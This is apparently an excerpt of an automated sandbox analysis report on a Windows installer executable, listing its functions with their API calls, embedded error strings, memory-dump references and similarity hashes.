Instruction Fuzzy Hash: 1701D872B44236BB9B209795CC0FF9F2A589F11B61F06013DFE14EA191EB64CE40E6E5

Function 00C9C253 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 51synchronizationthreadCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000001,000000FF,?,?,00C9C6FC,?,00C9138B,00000000,?,00C913BB,00000001), ref: 00C9C260
GetLastError.KERNEL32(?,?,00C9C6FC,?,00C9138B,00000000,?,00C913BB,00000001), ref: 00C9C26A
GetExitCodeThread.KERNEL32(00000001,00000000,?,?,00C9C6FC,?,00C9138B,00000000,?,00C913BB,00000001), ref: 00C9C2AC
GetLastError.KERNEL32(?,?,00C9C6FC,?,00C9138B,00000000,?,00C913BB,00000001), ref: 00C9C2B6

Strings

Failed to wait for cache thread to terminate., xrefs: 00C9C29E
core.cpp, xrefs: 00C9C294, 00C9C2E0
Failed to get cache thread exit code., xrefs: 00C9C2EA

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ErrorLast$CodeExitObjectSingleThreadWait
String ID: Failed to get cache thread exit code.$Failed to wait for cache thread to terminate.$core.cpp
API String ID: 3686190907-2546940223
Opcode ID: 24df8619293b186ecf1f65385f56d2bae33233ae2bbfe51f6d9c49f2b767d55e
Instruction ID: 33fbb5d6fef2bd7578b8fb50f33f8279af73b32fa0ee44a6a9d5147a592fa8ae
Opcode Fuzzy Hash: 24df8619293b186ecf1f65385f56d2bae33233ae2bbfe51f6d9c49f2b767d55e
Instruction Fuzzy Hash: FA115E71A8060AFAEF109BE1DD4AF5E7BB4AF11741F244169E510E61A0E775CB00BB14

Function 00C95EC7 Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 105stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00CC2603: SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,00000104,00000000,?,00CA7AD4,0000001C,00000000,00000000,00000000,00000000), ref: 00CC2624

lstrlenA.KERNEL32(E900CCF2,00000000,00C913BB,00000000,00C913BB,00C970D7,00C970D7,?,A4683C79,00C913BB,00C970BB,?,UninstallString,00C913BB), ref: 00C95F63

Strings

per-user, xrefs: 00C95F01, 00C95F06
Failed to find local %hs appdata directory., xrefs: 00C95F07
Failed to create regid folder: %ls, xrefs: 00C95FA3
per-machine, xrefs: 00C95EF7
UninstallString, xrefs: 00C95ECE
Failed to allocate regid folder path., xrefs: 00C95F91
Failed to write tag xml to file: %ls, xrefs: 00C95FAD

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: FolderPathlstrlen
String ID: Failed to allocate regid folder path.$Failed to create regid folder: %ls$Failed to find local %hs appdata directory.$Failed to write tag xml to file: %ls$UninstallString$per-machine$per-user
API String ID: 3664928333-3308940114
Opcode ID: af00a711e7e2a971d1ca3decd4aa3393ef018dd9cc5c5ad18292d69c769a8c48
Instruction ID: b1ce4da09a108e1f1407d13a9c56c533a7dd77efd106fbb7b285735b7d1b0a2e
Opcode Fuzzy Hash: af00a711e7e2a971d1ca3decd4aa3393ef018dd9cc5c5ad18292d69c769a8c48
Instruction Fuzzy Hash: CD31A172C00A29FBCF129FD4CC45FADBBB5EF44B20F21806AF915A6150DB319A51AB90

Function 00CB23E4 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 164COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNEL32(?,000000FE,?,00000000,?,?,?,00000000,?,00000000), ref: 00CB24A6
GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00CB24B0

Strings

Failed attempt to download URL: '%ls' to: '%ls', xrefs: 00CB2575
apply.cpp, xrefs: 00CB24D5
Failed to clear readonly bit on payload destination path: %ls, xrefs: 00CB24E0
download, xrefs: 00CB2471

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: AttributesErrorFileLast
String ID: Failed attempt to download URL: '%ls' to: '%ls'$Failed to clear readonly bit on payload destination path: %ls$apply.cpp$download
API String ID: 1799206407-2688335605
Opcode ID: f3d61db3e3a381dd3bd3956389199bc932801d6836489fe7bc98c625c6d10cf6
Instruction ID: d1e97cdc1cad7fa53e9c889ed25e4a58f2a8d48575fb853c8c0ab9b99e4a43f0
Opcode Fuzzy Hash: f3d61db3e3a381dd3bd3956389199bc932801d6836489fe7bc98c625c6d10cf6
Instruction Fuzzy Hash: 8251D071A00216AFDF219F99C841FEABBB8FF44B14F148059E515AA290E370DB81EB51

Function 00C97EF9 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C97F24

Strings

Failed to convert version: %ls to DWORD64 for ProductCode: %ls, xrefs: 00C98039
Failed to get version for product in machine context: %ls, xrefs: 00C98022
VersionString, xrefs: 00C97F64, 00C97F9D
Failed to enum related products., xrefs: 00C9800F
Failed to get version for product in user unmanaged context: %ls, xrefs: 00C97F8F

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: _memset
String ID: Failed to convert version: %ls to DWORD64 for ProductCode: %ls$Failed to enum related products.$Failed to get version for product in machine context: %ls$Failed to get version for product in user unmanaged context: %ls$VersionString
API String ID: 2102423945-1979147598
Opcode ID: 5885a731f77ae90d16fd46fa804e954891535f467ad9911b48abf5fe017f4377
Instruction ID: 2bb49b70a95a42bb100308f9ee6397b999536d81cb2bb7852cc3e8f24626e591
Opcode Fuzzy Hash: 5885a731f77ae90d16fd46fa804e954891535f467ad9911b48abf5fe017f4377
Instruction Fuzzy Hash: 67416D72C4025CAADF10EFE8C885DEDFBB9EB04344B21412EE91ABB101E6355E099B51

Function 00CA94F3 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 126sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000007D0,?,00000000,00000000,?), ref: 00CA9570

Part of subcall function 00CC6D15: _memset.LIBCMT ref: 00CC6D8A
Part of subcall function 00CC6D15: _memset.LIBCMT ref: 00CC6D98
Part of subcall function 00CC6D15: GetFileAttributesW.KERNEL32(?,?,?,?,00000000,?,00000000), ref: 00CC6DA1
Part of subcall function 00CC6D15: GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00CC6DBC

Strings

per-user, xrefs: 00CA95CE, 00CA95D3, 00CA9604, 00CA9609
Failed to get %hs package cache root directory., xrefs: 00CA95D4
Failed to ensure cache directory to remove was backslash terminated., xrefs: 00CA952B
Failed to get old %hs package cache root directory., xrefs: 00CA960A
per-machine, xrefs: 00CA95C5, 00CA95FB
Failed to calculate cache path., xrefs: 00CA9515

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: _memset$AttributesErrorFileLastSleep
String ID: Failed to calculate cache path.$Failed to ensure cache directory to remove was backslash terminated.$Failed to get %hs package cache root directory.$Failed to get old %hs package cache root directory.$per-machine$per-user
API String ID: 6426718-1559687374
Opcode ID: 01661c710791e9cdc59ace73da5105475db88f5adb0d766413a6e6712413d353
Instruction ID: 4fa7c98887c05532a878b5bfbbc708e080108316032ab9be660e0748fb13886b
Opcode Fuzzy Hash: 01661c710791e9cdc59ace73da5105475db88f5adb0d766413a6e6712413d353
Instruction Fuzzy Hash: F63146B2D00116FADF22B7A8CC87FAEBAA8DF56314F210526F815F6150E5754F40A692

Function 00CB18A7 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 123COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00CB18B8

Part of subcall function 00CC208E: GetModuleFileNameW.KERNEL32(00C9213E,?,00000104,?,00000104,?,00000000,?,?,00C9213E,?,00000000,?,?,?,76EEC3F0), ref: 00CC20AF

CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,?,000000FF,?,?,?,?,?,00000000,?,?,?,?), ref: 00CB1933

Part of subcall function 00CC238C: CompareStringW.KERNEL32(00000000,00000001,00000000,000000FF,00000000,000000FF,00000000,00000000,00000003,00000000,00000000,00000003,00000000,00000000), ref: 00CC23D0

Strings

Failed to extract payload: %ls from container: %ls, xrefs: 00CB19CE
Failed to extract all payloads from container: %ls, xrefs: 00CB197E
Failed to open container: %ls., xrefs: 00CB1911
Failed to skip the extraction of payload: %ls from container: %ls, xrefs: 00CB19DA

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CompareString$FileModuleName_memset
String ID: Failed to extract all payloads from container: %ls$Failed to extract payload: %ls from container: %ls$Failed to open container: %ls.$Failed to skip the extraction of payload: %ls from container: %ls
API String ID: 3323778125-3891707333
Opcode ID: aff934143a9038f8c1527b5ecaf18d3afcc9f153a5f6140218924e7752d1e810
Instruction ID: d213efa4c31816774b705a85141044c2ec03f17af970d516ac359073261adcb5
Opcode Fuzzy Hash: aff934143a9038f8c1527b5ecaf18d3afcc9f153a5f6140218924e7752d1e810
Instruction Fuzzy Hash: 77419D32C00268FBCF21AA94CC61DDEB7B8AF44320F644662FD25BB150D2319B50EB90

Function 00CC2498 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 123COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00C9214A,00000000,?,?,?,?,00C91E8E,00C9222A), ref: 00CC2530
GetLastError.KERNEL32(?,?,?,?,00C91E8E,00C9222A), ref: 00CC253E
GetTempPathW.KERNEL32(00000104,00000000,00000000,00000104,00000000,00000000,00C91E22,?,?,?,00C9B7FD,00000000,.ba%d,000F423F,00C91E8E,00C9222A), ref: 00CC2574
GetLastError.KERNEL32(?,?,?,00C9B7FD,00000000,.ba%d,000F423F,00C91E8E,00C9222A,00000000,00C91D56,?,?,00C9D991,CCBB4868,00C91E22), ref: 00CC2582

Strings

%s%s, xrefs: 00CC2513
pathutil.cpp, xrefs: 00CC25A7

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryPathTemp
String ID: %s%s$pathutil.cpp
API String ID: 2804724334-3961969462
Opcode ID: 45e50763283dcc8f35b4c034470ed65ec489a89952bbd173532f278d7a990591
Instruction ID: 8d9eb6526529a698ac60c2566f0e614d15e98c99d851d1f9065aa9f089ab6222
Opcode Fuzzy Hash: 45e50763283dcc8f35b4c034470ed65ec489a89952bbd173532f278d7a990591
Instruction Fuzzy Hash: 7D31E572D00129EBCB21ABA5CD99F9F7AA8AF00310F1505BDF915F7011DA788F80A791

Function 00CC0D87 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 120COMMONLIBRARYCODE

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0000FDE9), ref: 00CC0DD8
GetLastError.KERNEL32 ref: 00CC0DDE

Part of subcall function 00CC299C: GetProcessHeap.KERNEL32(00000000,?,?,00CC0EF7,?,?,00000000,00000000,?,?,?,00CBFD43,?,?,00000000,00000000), ref: 00CC29A4
Part of subcall function 00CC299C: HeapSize.KERNEL32(00000000,?,00CC0EF7,?,?,00000000,00000000,?,?,?,00CBFD43,?,?,00000000,00000000,?), ref: 00CC29AB

Strings

W, xrefs: 00CC0DB5
strutil.cpp, xrefs: 00CC0EB6

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: Heap$ByteCharErrorLastMultiProcessSizeWide
String ID: W$strutil.cpp
API String ID: 3662877508-3697633219
Opcode ID: df8f40f11db5253a20fdad7972f0316f6d085ff4637ab959e34badc06a50c8a4
Instruction ID: ef2f26918b7fb37efa7d40689c8f23afd867a84195c41f95ea1ca2b1c49243fa
Opcode Fuzzy Hash: df8f40f11db5253a20fdad7972f0316f6d085ff4637ab959e34badc06a50c8a4
Instruction Fuzzy Hash: 7E416FB1A40209EFDF109FA4CD81FAE7BB8EB04314F30896DE5A1E7291D2758E41AB50

Function 00CBFF1C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00CE7E3C,00000001,00000000,00000001,?,?,00CA2110,00000001,?,00000000,?,00000000,00000000,0000000D,00000000,Setup), ref: 00CBFF2E
CreateFileW.KERNEL32(40000000,00000001,00000000,?,00000080,00000000,?,00000000,?,?,00000000,00CE7E34,?,?,00CA2110,00000001), ref: 00CBFFCF
GetLastError.KERNEL32(?,?,00CA2110,00000001,?,00000000,?,00000000,00000000,0000000D,00000000,Setup,00000000,log,0000000D,00000000), ref: 00CBFFDF
SetFilePointer.KERNEL32(00000000,00000000,00000002,?,?,00CA2110,00000001,?,00000000,?,00000000,00000000,0000000D,00000000,Setup,00000000), ref: 00CC001A

Part of subcall function 00CC26A0: _memset.LIBCMT ref: 00CC26EF
Part of subcall function 00CC26A0: GetLocalTime.KERNEL32(?,?,?,?,00000000,?), ref: 00CC27E1

LeaveCriticalSection.KERNEL32(00CE7E3C,?,00000000,00CE7E34,?,?,00CA2110,00000001,?,00000000,?,00000000,00000000,0000000D,00000000,Setup), ref: 00CC006F

Strings

logutil.cpp, xrefs: 00CBFFFF

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CriticalFileSection$CreateEnterErrorLastLeaveLocalPointerTime_memset
String ID: logutil.cpp
API String ID: 654766419-3545173039
Opcode ID: c946a2bd8637785748f753c113d234b282bf50fbe8d1d3b066b888190fe6e3f7
Instruction ID: 3bda92c56a1fd7bf961df257548e04251f7810f3e4eefdc2a32b62fb6d54d0af
Opcode Fuzzy Hash: c946a2bd8637785748f753c113d234b282bf50fbe8d1d3b066b888190fe6e3f7
Instruction Fuzzy Hash: FD31B331501268FFCB21AFA1DC8AFAE7B66EB06B50F264529F41497561CB708D81E7E0

Function 00CA70BE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,0000000E,?,00000000,00000002,?,00CA72F1,0000000E,?,?,?,?), ref: 00CA70DB
lstrlenW.KERNEL32(?,?,00CA72F1,0000000E,?,?,?,?), ref: 00CA70E2
CompareStringW.KERNEL32(0000007F,?,?,00000000,?,00000000,?,00CA72F1,0000000E,?,?,?,?), ref: 00CA7129
CompareStringW.KERNEL32(0000007F,?,?,00000000,?,00000000,?,00CA72F1,0000000E,?,?,?,?), ref: 00CA7182
CompareStringW.KERNEL32(0000007F,?,?,00000000,?,00000000,?,00CA72F1,0000000E,?,?,?,?), ref: 00CA71B3

Strings

W, xrefs: 00CA7156

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CompareString$lstrlen
String ID: W
API String ID: 1657112622-655174618
Opcode ID: 055ee11003c175cedaef279b2150d19a015d4577de26af80fe9d2ae1100de14c
Instruction ID: 1de9bed18c1c76139ea1331f4cda991d7f3d23e03355eb9d49292f163ea1af64
Opcode Fuzzy Hash: 055ee11003c175cedaef279b2150d19a015d4577de26af80fe9d2ae1100de14c
Instruction Fuzzy Hash: 7D31A07150424ABBCF218F95CC45FAF3BA9FB86358F248915FA19DB110D275CE80DB61

Function 00CC425B Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 111stringregistryCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(F08B8007,057CF33B,BundleUpgradeCode,00C913BB,00000000,00000000,F08B8007,057CF33B,00020006,00000000,?,?,C53300CE), ref: 00CC4298
lstrlenW.KERNEL32(F08B8007,00020006,00000001,F08B8007,00020006,00000001,BundleUpgradeCode,00C913BB,00000000), ref: 00CC42F9
lstrlenW.KERNEL32(F08B8007), ref: 00CC4300
RegSetValueExW.ADVAPI32(00020006,00000000,00000000,00000007,00020006,00000000,00000001,00000000,00000000,00020006,00000001,BundleUpgradeCode,00C913BB,00000000), ref: 00CC433C

Strings

regutil.cpp, xrefs: 00CC4368
BundleUpgradeCode, xrefs: 00CC4263

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: lstrlen$Value
String ID: BundleUpgradeCode$regutil.cpp
API String ID: 198323757-1648651458
Opcode ID: a70add65a1b40c05e0400e080f0b6dbed0e07cd4caf41befa3481c1544def3f0
Instruction ID: dcf19208a3cefc4f2a554e87ad5f7609dc4103307a5ef262a752c132f5a6cb39
Opcode Fuzzy Hash: a70add65a1b40c05e0400e080f0b6dbed0e07cd4caf41befa3481c1544def3f0
Instruction Fuzzy Hash: 65413571D0020AEFCF05DFA5C991FAEBBB9FF40344F14806AEA10A7160D734EA519B60

Function 00C9FA3D Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 108COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,F468107D,00C917A9,00000001,?,00C917A9,00000001,000000FF,00C917A9,00C917AD,00000000,00C913C5,00000001,00000000,?,00C9BDAF), ref: 00C9FB4D

Strings

Failed to elevate., xrefs: 00C9FB36
Failed to create pipe name and client token., xrefs: 00C9FAA7
elevation.cpp, xrefs: 00C9FA71
Failed to create pipe and cache pipe., xrefs: 00C9FAC3
Failed to connect to elevated child process., xrefs: 00C9FB2B
UX aborted elevation requirement., xrefs: 00C9FA7B

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CloseHandle
String ID: Failed to connect to elevated child process.$Failed to create pipe and cache pipe.$Failed to create pipe name and client token.$Failed to elevate.$UX aborted elevation requirement.$elevation.cpp
API String ID: 2962429428-3003415917
Opcode ID: caa609830155d3f88930ca574f32c62fee92097813e3b9e46bfbddab1915533d
Instruction ID: aad064811374a323eef78f0c0b59ace3dbc4955b5e4e66c154562c614f8e645b
Opcode Fuzzy Hash: caa609830155d3f88930ca574f32c62fee92097813e3b9e46bfbddab1915533d
Instruction Fuzzy Hash: C131FB73240705BBDF119A74CC9DFAB72AD9B80724F21443DF659D7280EEB1DA47A224

Function 00CACB8F Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 105COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 00CACBF1

Strings

Failed to escape string., xrefs: 00CACC58
Failed to format property string part., xrefs: 00CACC5F
Failed to append property string part., xrefs: 00CACC66
Failed to format property value., xrefs: 00CACC51
%s%="%s", xrefs: 00CACC17

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: Open@16
String ID: %s%="%s"$Failed to append property string part.$Failed to escape string.$Failed to format property string part.$Failed to format property value.
API String ID: 3613110473-515423128
Opcode ID: 5ca8fde3e6bc120a268b759a14aa76ecb02cae3964fcd49f95aba1014a0fb21d
Instruction ID: dd581836628699481cb0f4e5d05bec935245aa2c37d7d5f3a9d167b8987540da
Opcode Fuzzy Hash: 5ca8fde3e6bc120a268b759a14aa76ecb02cae3964fcd49f95aba1014a0fb21d
Instruction Fuzzy Hash: A6318B72D0010BEBCF10AF98C9D28ADB7B8EB0131CB14457AFA25B2101D7315F50AB91

Function 00C9F4C1 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 94COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C9F4D8

Strings

Failed to find package: %ls, xrefs: 00C9F57B
Failed to read bundle dependency key from message buffer., xrefs: 00C9F523
Failed to read action., xrefs: 00C9F543
Failed to read package id from message buffer., xrefs: 00C9F500
Failed to execute package dependency action., xrefs: 00C9F59C

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: _memset
String ID: Failed to execute package dependency action.$Failed to find package: %ls$Failed to read action.$Failed to read bundle dependency key from message buffer.$Failed to read package id from message buffer.
API String ID: 2102423945-4197210911
Opcode ID: 3838e6c55a51413e1283d33de26fc2af07d0ce0f129f383d4199b2ea0b3cfb1d
Instruction ID: 33619d5a6e578c46c71b68d305ddc4cd91a43ebbee1895dc259216bfa2a75481
Opcode Fuzzy Hash: 3838e6c55a51413e1283d33de26fc2af07d0ce0f129f383d4199b2ea0b3cfb1d
Instruction Fuzzy Hash: C4314872D00169BADF12AED0DC49EEEBB78AB04720F11017AFA00F6150D731DB55AB91

Function 00CC0329 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

CheckTokenMembership.ADVAPI32(?,?,?,?,?,?,00CC0473,?,?,76EEC3F0,?,00000000), ref: 00CC036F
GetLastError.KERNEL32(?,?,?,00CC0473,?,?,76EEC3F0,?,00000000), ref: 00CC037D
AllocateAndInitializeSid.ADVAPI32(00CC0467,EC83EC8B,FFFFFEB6,5FFC4D8B,5BCD335E,FF809AE8,04C2C9FF,EC8B5500,FC5D89F6,FFF45D89,?,?,?), ref: 00CC03D0
GetLastError.KERNEL32(?,?,?,00CC0473,?,?,76EEC3F0,?,00000000), ref: 00CC03DA
FreeSid.ADVAPI32(?,?,?,?,00CC0473,?,?,76EEC3F0,?,00000000), ref: 00CC0410

Strings

aclutil.cpp, xrefs: 00CC039F

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ErrorLast$AllocateCheckFreeInitializeMembershipToken
String ID: aclutil.cpp
API String ID: 1125035699-2159165307
